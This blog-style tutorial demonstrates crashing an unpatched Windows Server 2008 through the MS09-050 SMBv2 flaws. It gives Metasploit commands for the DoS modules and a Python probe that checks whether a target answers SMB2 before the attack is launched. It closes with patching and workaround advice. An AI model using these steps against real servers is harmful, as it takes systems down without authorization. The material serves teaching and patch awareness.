Attacking an unpatched Windows 2008 Server

Microsoft cannot stress enough the importance of keeping your systems patched. And yet, server systems tend to drift from best practice, for several reasons:

  • The patch may break the application the server is running
  • The patch requires a reboot, which means unwanted downtime
  • It's simply a hassle
But unpatched systems are a great target for an attacker. Even if the attacker doesn't gain permanent access to the network, he/she can cause a nasty Denial of Service (DoS) against an unpatched server.
Here is the attack scenario.
We will use a Windows Server 2008 target for this demonstration. Win2008 is a good example because, even though it was released in 2008 and the R2 version is now available, a lot of companies are only now starting to deploy it. (The MS09-050 vulnerabilities used below affect Windows Vista and the original Windows Server 2008; Windows Server 2008 R2 is not affected.)

The attack is based on two well-known vulnerabilities in the Win2008 SRV2.SYS (SMBv2) driver, both fixed by Microsoft security bulletin MS09-050. In Metasploit, the corresponding auxiliary modules are known as:

  • ms09_050_smb2_negotiate_pidhigh
  • ms09_050_smb2_session_logoff
Both are Denial of Service attacks that crash the target's kernel, so they are auxiliary modules and are used without a payload. (The negotiate bug was later weaponised for remote code execution as well; Metasploit carries exploit/windows/smb/ms09_050_smb2_negotiate_func_index for that. This post sticks to the DoS side.)

To use these modules, fire up msfconsole and type the following. Note that the module lives under auxiliary/, not exploit/, and that for an auxiliary module run is the command that launches it (exploit is accepted as an alias):

msf > use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
msf auxiliary(ms09_050_smb2_negotiate_pidhigh) > set RHOST <target IP address>
msf auxiliary(ms09_050_smb2_negotiate_pidhigh) > run


You can do the same with the second module.
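Both modules only bite when srv2.sys is actually reachable: a server that negotiates SMB1 only, for example because the MS09-050 workaround of disabling SMBv2 was applied, will shrug the DoS off. The following is an added example (not code from the original post, and not a Metasploit module) that checks this before you fire either module. It sends a classic SMB1 NEGOTIATE offering the "SMB 2.002" dialect to TCP/445 and classifies the answer: an SMB2-capable server replies with an SMB2 NEGOTIATE response (magic 0xFE 'SMB'), an SMB1-only server with an SMB1 response (0xFF 'SMB'). Field layouts follow the [MS-CIFS] and [MS-SMB2] specifications; the probe itself is benign and leaves the PIDHigh field at zero. The two sample responses at the bottom are hand-constructed for offline testing, not captured traffic.

```python
"""Probe whether a host negotiates SMB2 on TCP/445 (added example, not from the post)."""
import socket
import struct
import sys

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
SMB2_DIALECT_2_002 = 0x0202


def _netbios(msg):
    """Prefix a NetBIOS session header: type 0x00 plus a 24-bit big-endian length."""
    return struct.pack(">I", len(msg)) + msg


def _smb1_header(flags=0x18):
    """32-byte SMB1 header for SMB_COM_NEGOTIATE. PIDHigh (the MS09-050 field) is left at 0."""
    return (SMB1_MAGIC
            + struct.pack("<BIBHH", SMB_COM_NEGOTIATE, 0, flags, 0xC853, 0)  # Command, Status, Flags, Flags2, PIDHigh
            + b"\x00" * 8                                                     # SecurityFeatures
            + struct.pack("<HHHHH", 0, 0, 0xFEFF, 0, 0))                       # Reserved, TID, PIDLow, UID, MID


def build_smb1_negotiate(dialects=("NT LM 0.12", "SMB 2.002")):
    """Build a NetBIOS-framed SMB1 NEGOTIATE request offering `dialects`."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)  # each: 0x02 + NUL-terminated name
    body = struct.pack("<BH", 0, len(data)) + data                             # WordCount=0, ByteCount, dialects
    return _netbios(_smb1_header() + body)


def parse_negotiate_response(raw):
    """Classify a NetBIOS-framed NEGOTIATE response.

    Returns ("SMB2", dialect_revision), ("SMB1", dialect_index) with None when
    the server rejected every offered dialect, or ("unknown", None).
    """
    if len(raw) < 4:
        return ("unknown", None)
    length = struct.unpack(">I", raw[:4])[0] & 0x00FFFFFF
    msg = raw[4:4 + length]
    if msg[:4] == SMB2_MAGIC and len(msg) >= 64 + 6:
        # 64-byte SMB2 header, then StructureSize(2) SecurityMode(2) DialectRevision(2)
        return ("SMB2", struct.unpack_from("<H", msg, 68)[0])
    if msg[:4] == SMB1_MAGIC and len(msg) >= 32 + 3 and msg[4] == SMB_COM_NEGOTIATE:
        word_count = msg[32]                                   # WordCount follows the 32-byte header
        dialect_index = struct.unpack_from("<H", msg, 33)[0]   # first parameter word
        if word_count == 0 or dialect_index == 0xFFFF:
            return ("SMB1", None)
        return ("SMB1", dialect_index)
    return ("unknown", None)


def probe(host, port=445, timeout=5.0):
    """Send the NEGOTIATE to host:port and return parse_negotiate_response's verdict."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_smb1_negotiate())
        hdr = s.recv(4)
        if len(hdr) < 4:
            return ("unknown", None)
        length = struct.unpack(">I", hdr)[0] & 0x00FFFFFF
        body = b""
        while len(body) < length:
            chunk = s.recv(length - len(body))
            if not chunk:
                break
            body += chunk
    return parse_negotiate_response(hdr + body)


def sample_smb2_response(dialect=SMB2_DIALECT_2_002):
    """Constructed SMB2 NEGOTIATE response, as an SMB2-capable server would send."""
    header = (SMB2_MAGIC
              + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0)  # StructureSize .. SessionId
              + b"\x00" * 16)                                                 # Signature
    body = struct.pack("<HHH", 0x41, 0x01, dialect) + b"\x00" * 59            # StructureSize, SecurityMode, DialectRevision
    return _netbios(header + body)


def sample_smb1_response(dialect_index=0):
    """Constructed SMB1 NEGOTIATE response from a server that speaks SMB1 only."""
    words = struct.pack("<H", dialect_index) + b"\x00" * 32                    # DialectIndex + remaining 16 words
    return _netbios(_smb1_header(flags=0x98) + struct.pack("<B", 17) + words + struct.pack("<H", 0))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    proto, dialect = probe(target)
    print(proto, hex(dialect) if dialect is not None else dialect)
```

Run it as `python smb2probe.py <target IP>`; a verdict of SMB2 with dialect 0x202 means srv2.sys is answering and the modules above have something to hit, while SMB1 means the SMBv2 path is closed and the DoS modules are pointless against that host.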

Here is the end result from the Metasploit command line:


And here is the end result on the Windows 2008 console:


Conclusion
Although this is just a demo, it is an excellent example of what happens to an unpatched server: one unauthenticated packet to TCP/445 and the box is down. Imagine this was the web server running your Web Site. For this particular issue the fix is the MS09-050 update (KB975517 for Windows Server 2008); until it is installed, Microsoft's documented workaround is to disable SMBv2 on the server or block TCP 139/445 at the firewall. Now go and patch your systems :)

Talkback and comments are most welcome
